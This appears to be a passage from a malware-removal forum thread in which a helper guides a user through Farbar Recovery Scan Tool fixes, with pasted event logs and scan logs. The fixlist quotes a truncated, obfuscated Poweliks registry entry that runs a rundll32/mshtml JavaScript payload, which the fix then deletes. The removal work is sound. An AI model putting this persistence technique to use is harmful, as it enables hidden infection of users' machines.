Description: Activation context generation failed for "Microsoft.Windows.Common-Controls,language="&#x2a;",processorArchitecture="amd64",publicKeyToken="6595b64144ccf1df",type="win32",version="6.0.0.0"1".
Dependent Assembly Microsoft.Windows.Common-Controls,language="&#x2a;",processorArchitecture="amd64",publicKeyToken="6595b64144ccf1df",type="win32",version="6.0.0.0" could not be found.
Please use sxstrace.exe for detailed diagnosis.
 
Error: (09/13/2014 06:21:34 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: Activation context generation failed for "Microsoft.Windows.Common-Controls,language="&#x2a;",processorArchitecture="amd64",publicKeyToken="6595b64144ccf1df",type="win32",version="6.0.0.0"1".
Dependent Assembly Microsoft.Windows.Common-Controls,language="&#x2a;",processorArchitecture="amd64",publicKeyToken="6595b64144ccf1df",type="win32",version="6.0.0.0" could not be found.
Please use sxstrace.exe for detailed diagnosis.
 
Error: (09/13/2014 00:13:55 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: qbw32.exe, version: 19.0.4014.705, time stamp: 0x4ef315cb
Faulting module name: ole32.dll, version: 6.1.7601.17514, time stamp: 0x4ce7b96f
Exception code: 0xc0000005
Fault offset: 0x0003bc24
Faulting process id: 0x19d8
Faulting application start time: 0xqbw32.exe0
Faulting application path: qbw32.exe1
Faulting module path: qbw32.exe2
Report Id: qbw32.exe3
 
Error: (09/13/2014 00:11:17 AM) (Source: QuickBooks) (EventID: 4) (User: )
Description: An unexpected error has occured in "QuickBooks Pro 2009":
An attempt to LogOff without a logon.
 
Error: (09/13/2014 00:10:32 AM) (Source: QuickBooks) (EventID: 4) (User: )
Description: An unexpected error has occured in "QuickBooks":
Returning NULL QBWinInstance Handle
 
Error: (09/13/2014 00:10:32 AM) (Source: QuickBooks) (EventID: 4) (User: )
Description: An unexpected error has occured in "QuickBooks":
Returning NULL QBWinInstance Handle
 
Error: (09/13/2014 00:10:32 AM) (Source: QuickBooks) (EventID: 4) (User: )
Description: An unexpected error has occured in "QuickBooks":
Returning NULL QBWinInstance Handle
 
Error: (09/13/2014 00:10:32 AM) (Source: QuickBooks) (EventID: 4) (User: )
Description: An unexpected error has occured in "QuickBooks":
Returning NULL QBWinInstance Handle
 
 
System errors:
=============
Error: (09/14/2014 07:03:10 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
 
Error: (09/13/2014 06:53:54 PM) (Source: Service Control Manager) (EventID: 7030) (User: )
Description: The PEVSystemStart service is marked as an interactive service.  However, the system is configured to not allow interactive services.  This service may not function properly.
 
Error: (09/13/2014 06:47:24 PM) (Source: Service Control Manager) (EventID: 7030) (User: )
Description: The PEVSystemStart service is marked as an interactive service.  However, the system is configured to not allow interactive services.  This service may not function properly.
 
Error: (09/13/2014 06:38:55 PM) (Source: Service Control Manager) (EventID: 7030) (User: )
Description: The PEVSystemStart service is marked as an interactive service.  However, the system is configured to not allow interactive services.  This service may not function properly.
 
Error: (09/13/2014 06:29:32 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Google Update Service (gupdate) service failed to start due to the following error: 
%%1053
 
Error: (09/13/2014 06:29:31 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the Google Update Service (gupdate) service to connect.
 
Error: (09/13/2014 06:28:56 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the Microsoft .NET Framework NGEN v4.0.30319_X86 service to connect.
 
Error: (09/13/2014 06:27:34 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
 
Error: (09/13/2014 06:25:55 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The DgiVecp service failed to start due to the following error: 
%%2
 
Error: (09/13/2014 11:37:02 AM) (Source: Service Control Manager) (EventID: 7030) (User: )
Description: The PEVSystemStart service is marked as an interactive service.  However, the system is configured to not allow interactive services.  This service may not function properly.
 
 
Microsoft Office Sessions:
=========================
 
==================== Memory info =========================== 
 
Processor: Intel® Pentium® 4 CPU 3.00GHz
Percentage of memory in use: 96%
Total physical RAM: 1022.15 MB
Available physical RAM: 40.21 MB
Total Pagefile: 3043.42 MB
Available Pagefile: 759.45 MB
Total Virtual: 2047.88 MB
Available Virtual: 1924.39 MB
 
==================== Drives ================================
 
Drive c: () (Fixed) (Total:465.66 GB) (Free:365.48 GB) NTFS
Drive e: (System Reserved) (Fixed) (Total:0.1 GB) (Free:0.06 GB) NTFS ==>[System with boot components (obtained from reading drive)]
 
==================== MBR & Partition Table ==================
 
========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 465.8 GB) (Disk ID: 38953894)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=465.7 GB) - (Type=07 NTFS)
 
==================== End Of Log ============================


#6 aharonov

  • Malware Response Team

Posted 15 September 2014 - 06:00 AM

Ok, now please run this fix:


Step 1

Please download the attached fixlist.txt and save it in the same directory as FRST.
  • Start FRST with Administrator privileges.
  • Press the Fix button.
  • When finished, a log file (Fixlog.txt) pops up and is saved to the same location the tool was run from.
    Please copy and paste its contents in your next reply.


Step 2

Start FRST with administrator privileges.
  • Press the Scan button.
  • When finished, FRST will produce a log (FRST.txt) in the same directory the tool was run from.
    Please copy and paste this log in your next reply.


#7 mpl006

  • Topic Starter

Posted 15 September 2014 - 08:50 PM

The first run of FRST has finished with the fixlist added.  The computer needed to restart after it was finished and is in the process of doing that.  Last time I restarted, it reinfected itself after reboot so hopefully that does not happen this time and we can continue with Step 2 from above.  As soon as I can get logged back in, I will start Step 2.

 

Here is the fixlog.txt:

 

Fix result of Farbar Recovery Tool (FRST written by Farbar) (x86) Version: 12-09-2014
Ran by Dale at 2014-09-15 07:45:34 Run:1
Running from C:\Users\Dale\Desktop
Boot Mode: Normal
 
==============================================
 
Content of fixlist:
*****************
CloseProcesses:
HKU\S-1-5-21-941127145-1180520044-1929224469-1000\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
FF DefaultSearchEngine: Conduit Search
FF SelectedSearchEngine: Conduit Search
EmptyTemp:
*****************
 
Processes closed successfully.
"HKU\S-1-5-21-941127145-1180520044-1929224469-1000\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32" => Key Deleted Successfully.
"HKU\S-1-5-21-941127145-1180520044-1929224469-1000\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" => Key deleted successfully.
Firefox DefaultSearchEngine deleted successfully.
Firefox SelectedSearchEngine deleted successfully.
EmptyTemp: => Removed 1.4 GB temporary data.
 
 
The system needed a reboot. 
 
==== End of Fixlog ====


#8 mpl006

  • Topic Starter

Posted 15 September 2014 - 10:10 PM

Here is the new FRST.txt:

 

Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version: 12-09-2014
Ran by Dale (administrator) on DIMENSION-E510 on 15-09-2014 20:57:36
Running from C:\Users\Dale\Desktop
Platform: Microsoft Windows 7 Ultimate  Service Pack 1 (X86) OS Language: English (United States)
Internet Explorer Version 11
Boot Mode: Normal
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG2014\avgrsx.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG2014\avgcsrvx.exe
(ATI Technologies Inc.) C:\Windows\System32\Ati2evxx.exe
(ATI Technologies Inc.) C:\Windows\System32\Ati2evxx.exe
(Schneider Electric) C:\Program Files\APC\PowerChute Personal Edition\mainserv.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG2014\avgidsagent.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG2014\avgwdsvc.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
() C:\Program Files\Canon\IJPLM\ijplmsvc.exe
(Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\VS7DEBUG\mdm.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG2014\avgui.exe
(Nero AG) C:\Program Files\Common Files\Nero\Nero BackItUp 4\NBService.exe
(Intuit) C:\Program Files\Common Files\Intuit\QuickBooks\QBCFMonitorService.exe
(Google Inc.) C:\Program Files\Google\Update\1.3.24.15\GoogleCrashHandler.exe
(Safer-Networking Ltd.) C:\Program Files\Spybot - Search & Destroy 2\SDFSSvc.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG2014\avgnsx.exe
(Safer-Networking Ltd.) C:\Program Files\Spybot - Search & Destroy 2\SDUpdSvc.exe
(TeamViewer GmbH) C:\Users\Dale\AppData\Local\Temp\TeamViewer\Version9\TeamViewer_Service.exe
(AVG Secure Search) C:\Program Files\Common Files\AVG Secure Search\vToolbarUpdater\18.1.9\ToolbarUpdater.exe
(Schneider Electric) C:\Program Files\APC\PowerChute Personal Edition\dataserv.exe
() C:\Program Files\Common Files\AVG Secure Search\vToolbarUpdater\18.1.9\loggingserver.exe
(Safer-Networking Ltd.) C:\Program Files\Spybot - Search & Destroy 2\SDWSCSvc.exe
(TeamViewer GmbH) C:\Users\Dale\AppData\Local\Temp\TeamViewer\Version9\TeamViewer.exe
(Safer-Networking Ltd.) C:\Program Files\Spybot - Search & Destroy 2\SDUpdate.exe
(TeamViewer GmbH) C:\Users\Dale\AppData\Local\Temp\TeamViewer\Version9\TeamViewer_Desktop.exe
(Microsoft Corporation) C:\Windows\System32\wuauclt.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
 
 
==================== Registry (Whitelisted) ==================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [AVG_UI] => C:\Program Files\AVG\AVG2014\avgui.exe [5188112 2014-08-25] (AVG Technologies CZ, s.r.o.)
ShellIconOverlayIdentifiers: GDriveBlacklistedOverlay -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D42} => C:\Program Files\Google\Drive\googledrivesync32.dll (Google)
ShellIconOverlayIdentifiers: GDriveSharedEditOverlay -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D44} => C:\Program Files\Google\Drive\googledrivesync32.dll (Google)
ShellIconOverlayIdentifiers: GDriveSharedViewOverlay -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D43} => C:\Program Files\Google\Drive\googledrivesync32.dll (Google)
ShellIconOverlayIdentifiers: GDriveSyncedOverlay -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D40} => C:\Program Files\Google\Drive\googledrivesync32.dll (Google)
ShellIconOverlayIdentifiers: GDriveSyncingOverlay -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D41} => C:\Program Files\Google\Drive\googledrivesync32.dll (Google)
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = https://www.google.com/
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache AcceptLangs = en-US
SearchScopes: HKLM - {443789B7-F39C-4b5c-9287-DA72D38F4FE6} URL = http://search.aol.com/aolcom/search?query={searchTerms}&invocationType=tb50aoldesktopie7
SearchScopes: HKCU - {443789B7-F39C-4b5c-9287-DA72D38F4FE6} URL = http://search.aol.com/aolcom/search?query={searchTerms}&invocationType=tb50aoldesktopie7
SearchScopes: HKCU - {95B7759C-8C7F-4BF1-B163-73684A933233} URL = http://isearch.avg.com/search?cid={21E441B3-EF26-436F-A6A1-95B7AB175FB8}&mid=a9a15af4a8a247d0815bd15a34568ce3-376f6faec36d28a09c55704a5acf6cec25c189f2&lang=en&ds=AVG&pr=fr&d=2012-03-25 12:31:25&v=15.3.0.11&pid=avg&sg=0&sap=dsp&q={searchTerms}
BHO: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll (Adobe Systems Incorporated)
BHO: Canon Easy-WebPrint EX BHO -> {3785D0AD-BFFF-47F6-BF5B-A587C162FED9} -> C:\Program Files\Canon\Easy-WebPrint EX\ewpexbho.dll (CANON INC.)
BHO: AVG Safe Search -> {3CA2F312-6F6E-4B53-A66E-4E65E497C8C0} -> C:\Program Files\AVG\AVG2012\avgssie.dll No File
BHO: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files\Microsoft Office\Office12\GrooveShellExtensions.dll (Microsoft Corporation)
BHO: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre6\bin\ssv.dll (Sun Microsystems, Inc.)
BHO: AVG Security Toolbar -> {95B7759C-8C7F-4BF1-B163-73684A933233} -> C:\Program Files\AVG Secure Search\18.1.9.799\AVG Secure Search_toolbar.dll (AVG Secure Search)
BHO: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre6\bin\jp2ssv.dll (Sun Microsystems, Inc.)
Toolbar: HKLM - AVG Security Toolbar - {95B7759C-8C7F-4BF1-B163-73684A933233} - C:\Program Files\AVG Secure Search\18.1.9.799\AVG Secure Search_toolbar.dll (AVG Secure Search)
Toolbar: HKLM - Canon Easy-WebPrint EX - {759D9886-0C6F-4498-BAB6-4A5F47C6C72F} - C:\Program Files\Canon\Easy-WebPrint EX\ewpexhlp.dll (CANON INC.)
Toolbar: HKCU - No Name - {2318C2B1-4965-11D4-9B18-009027A5CD4F} -  No File
Handler: grooveLocalGWS - {88FED34C-F0CA-4636-A375-3CB6248B04CD} - C:\Program Files\Microsoft Office\Office12\GrooveSystemServices.dll (Microsoft Corporation)
Handler: intu-help-qb2 - {84D77A00-41B5-4b8b-8ADF-86486D72E749} - C:\Program Files\Intuit\QuickBooks 2009\HelpAsyncPluggableProtocol.dll (Intuit, Inc.)
Handler: linkscanner - {F274614C-63F8-47D5-A4D1-FBDDE494F8D1} - C:\Program Files\AVG\AVG2012\avgpp.dll No File
Handler: qbwc - {FC598A64-626C-4447-85B8-53150405FD57} - C:\Windows\system32\mscoree.dll (Microsoft Corporation)
Handler: viprotocol - {B658800C-F66E-4EF3-AB85-6C0C227862A9} - C:\Program Files\Common Files\AVG Secure Search\ViProtocolInstaller\18.1.9\ViProtocol.dll (AVG Secure Search)
Winsock: Catalog5 07 C:\Program Files\Bonjour\mdnsNSP.dll [121704] (Apple Inc.)
Tcpip\Parameters: [DhcpNameServer] 208.180.42.68 208.180.42.100
 
FireFox:
========
FF ProfilePath: C:\Users\Dale\AppData\Roaming\Mozilla\Firefox\Profiles\pyqw91t4.default
FF Homepage: about:home
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF32_11_9_900_170.dll ()
FF Plugin: @Apple.com/iTunes,version=1.0 -> C:\Program Files\iTunes\Mozilla Plugins\npitunes.dll ()
FF Plugin: @avg.com/AVG SiteSafety plugin,version=11.0.0.1,application/x-avg-sitesafety-plugin -> C:\Program Files\Common Files\AVG Secure Search\SiteSafetyInstaller\18.1.9\\npsitesafety.dll No File
FF Plugin: @canon.com/EPPEX -> C:\Program Files\Canon\Easy-PhotoPrint EX\NPEZFFPI.DLL (CANON INC.)
FF Plugin: @Google.com/GoogleEarthPlugin -> C:\Program Files\Google\Google Earth\plugin\npgeplugin.dll (Google)
FF Plugin: @java.com/JavaPlugin -> C:\Program Files\Java\jre6\bin\plugin2\npjp2.dll (Sun Microsystems, Inc.)
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin: @tools.google.com/Google Update;version=3 -> C:\Program Files\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF Plugin: @tools.google.com/Google Update;version=9 -> C:\Program Files\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF Plugin: @viewpoint.com/VMP -> C:\Program Files\Viewpoint\Viewpoint Experience Technology\npViewpoint.dll ()
FF Plugin: Adobe Reader -> C:\Program Files\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF SearchPlugin: C:\Program Files\mozilla firefox\browser\searchplugins\avg-secure-search.xml
FF Extension: Firefox Old Version Update Hotfix - C:\Users\Dale\AppData\Roaming\Mozilla\Firefox\Profiles\pyqw91t4.default\Extensions\firefox-hotfix@mozilla.org.xpi [2014-08-22]
FF HKLM\...\Firefox\Extensions: [avg@toolbar] - C:\ProgramData\AVG Secure Search\FireFoxExt\18.1.9.799
FF Extension: AVG Security Toolbar - C:\ProgramData\AVG Secure Search\FireFoxExt\18.1.9.799 [2014-08-25]
 
Chrome: 
=======
CHR DefaultSuggestURL: Default -> {google:baseSuggestURL}search?{google:searchFieldtrialParameter}client=chrome&q={searchTerms}&{google:cursorPosition}sugkey={google:suggestAPIKeyParameter}
CHR CustomProfile: C:\Users\Dale\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Docs) - C:\Users\Dale\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2013-07-06]
CHR Extension: (Google Drive) - C:\Users\Dale\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2013-07-06]
CHR Extension: (YouTube) - C:\Users\Dale\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2013-07-06]
CHR Extension: (Google Search) - C:\Users\Dale\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2013-07-06]
CHR Extension: (AVG Security Toolbar) - C:\Users\Dale\AppData\Local\Google\Chrome\User Data\Default\Extensions\ndibdjnfmopecpmkdieinmbadjfpblof [2013-07-06]
CHR Extension: (Gmail) - C:\Users\Dale\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2013-07-06]
 
========================== Services (Whitelisted) =================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
S3 AOL ACS; C:\Program Files\Common Files\AOL\ACS\AOLAcsd.exe [46640 2006-10-23] (AOL LLC)
R2 APC Data Service; C:\Program Files\APC\PowerChute Personal Edition\dataserv.exe [21880 2012-01-24] (Schneider Electric)
R2 APC UPS Service; C:\Program Files\APC\PowerChute Personal Edition\mainserv.exe [705912 2012-01-24] (Schneider Electric)
R2 AVGIDSAgent; C:\Program Files\AVG\AVG2014\avgidsagent.exe [3242000 2014-08-25] (AVG Technologies CZ, s.r.o.)
R2 avgwd; C:\Program Files\AVG\AVG2014\avgwdsvc.exe [289328 2014-08-25] (AVG Technologies CZ, s.r.o.)
R2 IJPLMSVC; C:\Program Files\Canon\IJPLM\IJPLMSVC.EXE [138192 2011-02-07] ()
R2 MDM; C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\mdm.exe [335872 2006-10-26] (Microsoft Corporation) [File not signed]
R2 QBCFMonitorService; C:\Program Files\Common Files\Intuit\QuickBooks\QBCFMonitorService.exe [45056 2011-12-22] (Intuit) [File not signed]
R2 SDScannerService; C:\Program Files\Spybot - Search & Destroy 2\SDFSSvc.exe [1738168 2014-06-24] (Safer-Networking Ltd.)
R2 SDUpdateService; C:\Program Files\Spybot - Search & Destroy 2\SDUpdSvc.exe [2088408 2014-06-27] (Safer-Networking Ltd.)
R2 SDWSCService; C:\Program Files\Spybot - Search & Destroy 2\SDWSCSvc.exe [171928 2014-04-25] (Safer-Networking Ltd.)
R2 TeamViewer9; c:\users\dale\appdata\local\temp\teamviewer\version9\TeamViewer_Service.exe [4382992 2014-09-12] (TeamViewer GmbH)
R2 vToolbarUpdater18.1.9; C:\Program Files\Common Files\AVG Secure Search\vToolbarUpdater\18.1.9\ToolbarUpdater.exe [1820184 2014-08-12] (AVG Secure Search)
 
==================== Drivers (Whitelisted) ====================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
R1 Avgdiskx; C:\Windows\System32\DRIVERS\avgdiskx.sys [121624 2014-06-30] (AVG Technologies CZ, s.r.o.)
R1 AVGIDSDriver; C:\Windows\System32\DRIVERS\avgidsdriverx.sys [200984 2014-07-21] (AVG Technologies CZ, s.r.o.)
R0 AVGIDSHX; C:\Windows\System32\DRIVERS\avgidshx.sys [147736 2014-06-17] (AVG Technologies CZ, s.r.o.)
R1 AVGIDSShim; C:\Windows\System32\DRIVERS\avgidsshimx.sys [21272 2014-06-17] (AVG Technologies CZ, s.r.o.)
R1 Avgldx86; C:\Windows\System32\DRIVERS\avgldx86.sys [188696 2014-06-17] (AVG Technologies CZ, s.r.o.)
R0 Avglogx; C:\Windows\System32\DRIVERS\avglogx.sys [241944 2014-06-17] (AVG Technologies CZ, s.r.o.)
R0 Avgmfx86; C:\Windows\System32\DRIVERS\avgmfx86.sys [98584 2014-08-06] (AVG Technologies CZ, s.r.o.)
R0 Avgrkx86; C:\Windows\System32\DRIVERS\avgrkx86.sys [27416 2014-06-17] (AVG Technologies CZ, s.r.o.)
R1 Avgtdix; C:\Windows\System32\DRIVERS\avgtdix.sys [197400 2014-06-17] (AVG Technologies CZ, s.r.o.)
R1 avgtp; C:\Windows\system32\drivers\avgtpx86.sys [42784 2014-08-12] (AVG Technologies)
R3 wanatw; C:\Windows\System32\DRIVERS\wanatw4.sys [33588 2006-11-29] (America Online, Inc.)
S3 catchme; \??\C:\Users\Dale\AppData\Local\Temp\catchme.sys [X]
S2 DgiVecp; \??\C:\Windows\system32\Drivers\DgiVecp.sys [X]
S3 Synth3dVsc; System32\drivers\synth3dvsc.sys [X]
S3 tsusbhub; system32\drivers\tsusbhub.sys [X]
S3 VGPU; System32\drivers\rdvgkmd.sys [X]
 
==================== NetSvcs (Whitelisted) ===================
 
 
(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)
 
 
==================== One Month Created Files and Folders ========
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2014-09-15 20:44 - 2014-09-15 20:44 - 04968160 _____ (TeamViewer) C:\Users\Dale\Downloads\TeamViewerQS_en-ckj.exe
2014-09-14 20:11 - 2014-09-14 20:10 - 04859480 _____ () C:\Users\Dale\Desktop\RogueKiller.exe
2014-09-14 19:26 - 2014-09-14 19:42 - 00047150 _____ () C:\Users\Dale\Desktop\Addition.txt
2014-09-14 18:13 - 2014-09-15 07:29 - 00000000 ____D () C:\Users\Dale\AppData\Roaming\TeamViewer
2014-09-14 18:12 - 2014-09-14 18:12 - 04691456 _____ (TeamViewer) C:\Users\Dale\Downloads\TeamViewerQS_en.exe
2014-09-13 18:58 - 2014-09-13 18:58 - 00054720 _____ () C:\ComboFix.txt
2014-09-13 12:00 - 2014-09-13 12:00 - 02347384 _____ (ESET) C:\Users\Dale\Downloads\esetsmartinstaller_enu.exe
2014-09-13 11:54 - 2014-09-13 11:54 - 00231760 _____ () C:\Users\Dale\Downloads\CrucialScan.exe
2014-09-13 11:47 - 2014-09-15 20:57 - 00014789 _____ () C:\Users\Dale\Desktop\FRST.txt
2014-09-13 11:47 - 2014-09-15 20:57 - 00000000 ____D () C:\FRST
2014-09-13 10:44 - 2011-06-26 01:45 - 00256000 _____ () C:\Windows\PEV.exe
2014-09-13 10:44 - 2010-11-07 12:20 - 00208896 _____ () C:\Windows\MBR.exe
2014-09-13 10:44 - 2009-04-19 23:56 - 00060416 _____ (NirSoft) C:\Windows\NIRCMD.exe
2014-09-13 10:44 - 2000-08-30 19:00 - 00518144 _____ (SteelWerX) C:\Windows\SWREG.exe
2014-09-13 10:44 - 2000-08-30 19:00 - 00406528 _____ (SteelWerX) C:\Windows\SWSC.exe
2014-09-13 10:44 - 2000-08-30 19:00 - 00098816 _____ () C:\Windows\sed.exe
2014-09-13 10:44 - 2000-08-30 19:00 - 00080412 _____ () C:\Windows\grep.exe
2014-09-13 10:44 - 2000-08-30 19:00 - 00068096 _____ () C:\Windows\zip.exe
2014-09-13 10:41 - 2014-09-13 10:41 - 00000000 ____D () C:\Users\Dale\Documents\ProcAlyzer Dumps
2014-09-13 10:19 - 2014-09-13 18:58 - 00000000 ____D () C:\Qoobox
2014-09-13 10:19 - 2014-09-13 11:38 - 00000000 ____D () C:\Windows\erdnt
2014-09-13 10:18 - 2014-09-13 02:20 - 01097728 _____ (Farbar) C:\Users\Dale\Desktop\FRST.exe
2014-09-13 10:18 - 2014-09-13 02:19 - 05577449 ____R (Swearware) C:\Users\Dale\Desktop\ComboFix.exe
2014-09-13 01:38 - 2014-09-13 01:50 - 00110296 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-09-13 01:34 - 2014-09-13 01:34 - 00001020 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-09-13 01:34 - 2014-09-13 01:34 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-09-13 01:34 - 2014-09-13 01:34 - 00000000 ____D () C:\Program Files\Malwarebytes Anti-Malware
2014-09-13 01:34 - 2014-05-12 07:26 - 00051928 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2014-09-13 01:34 - 2014-05-12 07:25 - 00074456 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2014-09-13 01:33 - 2014-09-13 01:33 - 17292760 _____ (Malwarebytes Corporation ) C:\Users\Dale\Downloads\mbam-setup-2.0.2.1012.exe
2014-09-13 00:33 - 2014-09-13 00:33 - 00007605 _____ () C:\Users\Dale\AppData\Local\Resmon.ResmonCfg
2014-09-12 19:00 - 2014-08-19 12:39 - 00327872 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2014-09-12 19:00 - 2014-08-18 17:26 - 17455104 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2014-09-12 19:00 - 2014-08-18 17:08 - 04232704 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2014-09-12 19:00 - 2014-08-18 16:57 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2014-09-12 19:00 - 2014-08-18 16:57 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll
2014-09-12 19:00 - 2014-08-18 16:46 - 00454656 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2014-09-12 19:00 - 2014-08-18 16:45 - 00061952 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2014-09-12 19:00 - 2014-08-18 16:44 - 00061952 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2014-09-12 19:00 - 2014-08-18 16:44 - 00051200 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll
2014-09-12 19:00 - 2014-08-18 16:42 - 02185728 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2014-09-12 19:00 - 2014-08-18 16:39 - 00043008 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2014-09-12 19:00 - 2014-08-18 16:39 - 00032768 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2014-09-12 19:00 - 2014-08-18 16:37 - 00440320 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2014-09-12 19:00 - 2014-08-18 16:36 - 00112128 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2014-09-12 19:00 - 2014-08-18 16:36 - 00108032 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
2014-09-12 19:00 - 2014-08-18 16:35 - 00597504 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2014-09-12 19:00 - 2014-08-18 16:30 - 00646144 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe
2014-09-12 19:00 - 2014-08-18 16:27 - 00365056 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2014-09-12 19:00 - 2014-08-18 16:22 - 00060416 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll
2014-09-12 19:00 - 2014-08-18 16:19 - 00164864 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll
2014-09-12 19:00 - 2014-08-18 16:17 - 00243200 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2014-09-12 19:00 - 2014-08-18 16:17 - 00069632 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2014-09-12 19:00 - 2014-08-18 16:15 - 11769856 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2014-09-12 19:00 - 2014-08-18 16:09 - 00603136 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2014-09-12 19:00 - 2014-08-18 16:08 - 02014208 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2014-09-12 19:00 - 2014-08-18 16:08 - 00673792 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
